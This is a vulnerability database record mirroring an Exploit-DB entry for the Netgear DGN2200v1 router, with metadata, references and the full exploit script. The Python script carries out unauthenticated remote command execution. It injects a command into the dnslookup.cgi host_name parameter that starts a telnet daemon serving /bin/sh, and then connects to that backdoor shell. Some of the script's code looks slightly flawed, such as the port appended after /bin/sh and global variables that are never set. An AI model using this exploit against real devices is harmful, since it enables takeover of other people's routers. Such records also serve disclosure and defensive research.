Details of VAR-E-202107-0038

ID

VAR-E-202107-0038

EDB ID

50099

TITLE

Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 50099

DESCRIPTION

Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated).. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 50099

AFFECTED PRODUCTS

vendor:

netgear

model:

dgn2200v1

scope:

version:

Trust: 1.6

sources: EXPLOIT-DB: 50099 // EDBNET: 104550

EXPLOIT

# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)
# Date: 02.07.2021
# Exploit Author: SivertPL
# Vendor Homepage: https://www.netgear.com/
# Version: All prior to v1.0.0.60

#!/usr/bin/python

"""
NETGEAR DGN2200v1 Unauthenticated Remote Command Execution

Author: SivertPL (kroppoloe@protonmail.ch)
Date: 02.07.2021
Status: Patched in some models
Version: All prior to v1.0.0.60
Impact: Critical

CVE: No CVE number assigned
PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365

References:
1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1

The exploit script only works on UNIX-based systems.

This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past.
This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol.

"""

import sys
import requests
import os

target_ip = "192.168.0.1"
telnet_port = 666
sent = False

def main():
if len(sys.argv) < 3:
print "./dgn2200_pwn.py <router ip> <backdoor-port>"
exit()

target_ip = sys.argv[1]
telnet_port = int(sys.argv[2])
print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..."
send_payload()
print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..."
print "[!] If it fails to connect it means the target is probably not vulnerable"
spawn_shell()

def send_payload():
try:
requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true")
sent = True
except Exception:
sent = False
print "[-] Unknown error, target might not be vulnerable."

def spawn_shell():
if sent:
print "[+] Dropping a shell..."
os.system("telnet " + target_ip + " " + telnet_port)
else:
exit()

if __name__ == "__main__":
main()

Trust: 1.0

sources: EXPLOIT-DB: 50099

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 50099

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 50099

TYPE

Remote Command Execution (RCE) (Unauthenticated)

Trust: 1.6

sources: EXPLOIT-DB: 50099 // EDBNET: 104550

CREDITS

SivertPL

Trust: 0.6

sources: EXPLOIT-DB: 50099

EXTERNAL IDS

db:	EXPLOIT-DB	id:	50099	Trust: 1.6
db:	EDBNET	id:	104550	Trust: 0.6

sources: EXPLOIT-DB: 50099 // EDBNET: 104550

REFERENCES

url:

https://www.exploit-db.com/exploits/50099/

Trust: 0.6

sources: EDBNET: 104550

SOURCES

db:	EXPLOIT-DB	id:	50099
db:	EDBNET	id:	104550

LAST UPDATE DATE

2022-07-27T09:21:08.605000+00:00

SOURCES RELEASE DATE

db:	EXPLOIT-DB	id:	50099	date:	2021-07-06T00:00:00
db:	EDBNET	id:	104550	date:	2021-07-06T00:00:00